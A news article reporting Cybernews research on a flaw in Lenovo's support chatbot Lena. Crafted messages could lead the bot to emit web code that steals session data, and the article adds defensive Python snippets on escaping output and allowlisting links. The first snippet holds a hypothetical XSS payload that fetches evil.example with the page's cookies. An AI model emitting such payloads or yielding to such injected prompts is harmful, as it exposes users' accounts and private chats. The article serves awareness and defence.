The Invisible Risks of AI Help: What Lenovo’s Chatbot Flaw Means for Everyday Users
- Finopotamus Staff
- Sep 2, 2025
- 5 min read
Experts warn AI chatbots are becoming the new email inboxes – easy targets packed with personal data.
When users click “chat with us” on Lenovo’s website, they expect a quick and safe way to get help. But recent research from Cybernews shows that chatting with Lenovo’s AI assistant, Lena, could have put your private information at risk – exposing past support conversations, and even allowing scammers to trick users with fake pop-ups and phishing schemes.
Simply asking a question could have been enough for attackers to hijack user accounts or steal sensitive data, turning a helpful chatbot into a hidden threat. Aras Nazarovas, a cybersecurity researcher at Cybernews, captures the urgency: “AI chatbots, in a sense, have become the new email inboxes – easy targets full of personal data. Until security practices catch up with innovation, consumers must carry the burden of cautious trust.”
Chatting with Customer Service Isn’t Always Private
Researchers found that Lenovo’s chatbot, Lena, could be fooled by attackers into sharing private information – like the details of your support chats and login sessions. Simply by sending the right kind of message, hackers could trick the bot into handing over data that’s meant to be private.
Worse still, this flaw could let attackers pretend to be Lenovo support agents or push fake warnings and downloads to customers, putting personal information and devices at risk.
Lenovo responded quickly after being alerted and has already fixed the problem, so customers are protected going forward. But the incident shows just how risky AI chatbots can be when security doesn’t keep pace with new technology.
“AI chatbots don’t know what’s safe or dangerous – they follow instructions exactly. Without proper security safeguards, even small mistakes can let hackers sneak in and access your personal information. And this might be the case for many AI chatbots delivering customer service,” warned Nazarovas.
The main problem was that Lena could be tricked into running hidden code inside certain messages. In one test, researchers fooled the chatbot into executing web code that could grab private information (like login details) from both customers and support agents.
That information could then be used by hackers to take over active accounts and read past conversations that include things like purchase details or personal information. In short, what users thought was a safe chat with Lenovo could actually let attackers get their hands on their data.
“This isn’t just Lenovo’s problem. Any AI system without strict input and output controls creates an opening for attackers. LLMs don’t have an instinct for ‘safe’ – they follow instructions exactly as given. Without strong guardrails and continuous monitoring, even small oversights can turn into major security incidents,” said Žilvinas Girėnas, Head of Product at nexos.ai.
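The fix researchers describe amounts to treating everything a chatbot says as untrusted text. As a minimal sketch (not Lenovo's actual code, and the payload below is a hypothetical example in the spirit of the test described above), escaping the model's output before it reaches the browser turns injected markup into harmless text instead of executable code:

```python
import html

def render_chat_message(raw_reply: str) -> str:
    """Escape chatbot output before inserting it into the support page.

    The model's reply is untrusted: a prompt-injection payload can make it
    emit HTML that would run in the customer's (or support agent's) browser.
    Escaping converts the markup into inert, visible text.
    """
    return html.escape(raw_reply)

# Hypothetical injected payload that tries to exfiltrate session cookies:
payload = '<img src="x" onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">'
safe = render_chat_message(payload)
print(safe)  # the <img ...> tag is now plain text, so nothing executes
```

This is only one layer; the researchers' broader point is that both what goes *into* the model and what comes *out* of it need such controls.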
How Chatting with AI Chatbots Could Lead to Scams
The danger doesn’t stop at lost privacy. Attackers can use a compromised chatbot as a staging ground for more manipulative schemes. Pop-up windows that mimic trusted log‑in screens, fake CAPTCHA checks that harvest credentials, even phony requests to “download the latest Lenovo update” could be embedded in the support flow. For an unsuspecting consumer, the line between legitimate help and fraud becomes impossible to see.
“What makes this case particularly worrying is not simply that Lenovo fell short on basic web security practices, but that the shortfall occurred in a tool designed specifically to interface with end users,” said Nazarovas. “The chatbot wasn’t a quiet back‑office experiment. It sat on the front page of Lenovo’s consumer portal, the very place customers go to seek trustworthy assistance. That blurs the boundary between corporate security flaws and direct consumer harm.”
It could be filed under “AI growing pains,” an inevitable mishap in the rush to fold large language models into every corner of business. But as researchers point out, the lesson isn’t an abstract one: input and output from AI systems should be treated as inherently unsafe.
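One concrete way to apply that lesson is to refuse to show customers any link a chatbot produces unless it points at a domain the company actually controls. The sketch below is purely illustrative – the allowlist and function names are assumptions, not anything Lenovo or Cybernews describes – but it shows the "output is inherently unsafe" posture in practice:

```python
from urllib.parse import urlparse

# Hypothetical allowlist: only links on the vendor's own domains survive.
ALLOWED_HOSTS = {"lenovo.com", "support.lenovo.com"}

def strip_untrusted_links(urls: list[str]) -> list[str]:
    """Drop any link in a chatbot reply whose host is not explicitly trusted."""
    safe = []
    for url in urls:
        host = urlparse(url).hostname or ""
        if host in ALLOWED_HOSTS or host.endswith(".lenovo.com"):
            safe.append(url)
    return safe

links = [
    "https://support.lenovo.com/drivers",
    "https://evil.example/fake-lenovo-update.exe",  # phishing-style lure
]
print(strip_untrusted_links(links))  # only the support.lenovo.com link remains
```

An allowlist is deliberately conservative: it will sometimes block a legitimate third-party link, but it can never be tricked into endorsing a "latest Lenovo update" hosted on an attacker's server.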
“Just like people have learned to be careful with suspicious emails and public Wi-Fi, companies need to make sure their AI chatbots are safe to use. If they don’t, it’s easier for hackers to sneak into the very places customers trust most when they’re asking for help,” added Nazarovas. “For consumers, this means staying cautious when interacting with chatbots like Lena: don’t click on unexpected links or pop-ups in chat windows, never share personal or payment information through a chatbot, and if something feels off, reach out to the company through official websites or phone numbers to verify before trusting chatbot responses.”
ABOUT CYBERNEWS
Cybernews is a globally recognized independent media outlet where journalists and security experts investigate cyber threats through research, testing, and data. Founded in 2019 in response to rising concerns about online security, the site covers breaking news, conducts original investigations, and offers unique perspectives on the evolving digital security landscape. Through white-hat investigative techniques, the Cybernews research team identifies and safely discloses cybersecurity threats and vulnerabilities, while the editorial team provides cybersecurity-related news, analysis, and opinions by industry insiders with complete independence.
Cybernews has earned worldwide attention for its high-impact research and discoveries, which have uncovered some of the internet’s most significant security exposures and data leaks. Notable ones include:
- Cybernews researchers discovered multiple open datasets comprising 16 billion login credentials from infostealer malware, social media, developer portals, and corporate networks – highlighting the unprecedented risks of account takeovers, phishing, and business email compromise.
- Cybernews researchers analyzed 156,080 randomly selected iOS apps – around 8% of the apps present on the App Store – and uncovered a massive oversight: 71% of them expose sensitive data.
- Recently, Bob Dyachenko, a cybersecurity researcher and owner of SecurityDiscovery.com, and the Cybernews security research team discovered an unprotected Elasticsearch index, which contained a wide range of sensitive personal details related to the entire population of Georgia.
- The team analyzed the new Pixel 9 Pro XL smartphone’s web traffic, and found that Google's latest flagship smartphone frequently transmits private user data to the tech giant before any app is installed.
- The team revealed that a massive data leak at MC2 Data, a background check firm, affects one-third of the US population.
- The Cybernews security research team discovered that the 50 most popular Android apps require 11 dangerous permissions on average.
- They revealed that two online PDF makers leaked tens of thousands of user documents, including passports, driving licenses, certificates, and other personal information uploaded by users.
- An analysis by Cybernews research discovered over a million publicly exposed secrets from over 58 thousand websites’ exposed environment (.env) files.
- The team revealed that Australia’s football governing body, Football Australia, leaked secret keys potentially opening access to 127 buckets of data, including ticket buyers’ personal data and players’ contracts and documents.
- The Cybernews research team, in collaboration with cybersecurity researcher Bob Dyachenko, discovered a massive data leak containing information from numerous past breaches, comprising 12 terabytes of data and spanning over 26 billion records.
- The team analyzed NASA’s website, and discovered an open redirect vulnerability plaguing NASA’s Astrobiology website.
- The team investigated 30,000 Android apps, and discovered that over half of them are leaking secrets that could have huge repercussions for both app developers and their customers.